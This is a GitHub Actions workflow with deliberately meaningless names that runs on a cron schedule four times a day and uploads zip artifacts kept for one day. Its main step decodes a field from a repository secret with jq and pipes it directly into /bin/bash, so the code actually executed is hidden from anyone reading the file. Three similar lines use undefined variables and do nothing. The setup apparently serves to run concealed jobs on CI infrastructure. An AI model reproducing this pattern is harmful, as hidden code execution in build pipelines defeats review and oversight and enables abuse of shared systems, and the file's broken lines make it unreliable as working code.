name: enrenqimin
on:
  workflow_dispatch:

  schedule:
    - cron: '13 3,9,15,21 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: enrenqimin
        env:
          beh26394: ${{ secrets.beh26394 }}
        run: |
          printf '%s' "$beh26394" | jq -r .vgf65 | /bin/bash
          echo $fqrqx705 | jq -r .x11482 | /bin/bash
          echo $yglmk774 | jq -r .btdi9034 | /bin/bash
          printf '%s' "$shs830" | jq -r .hilve0 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: Qiu4ZEne
          path: "*.zip"
          retention-days: 1
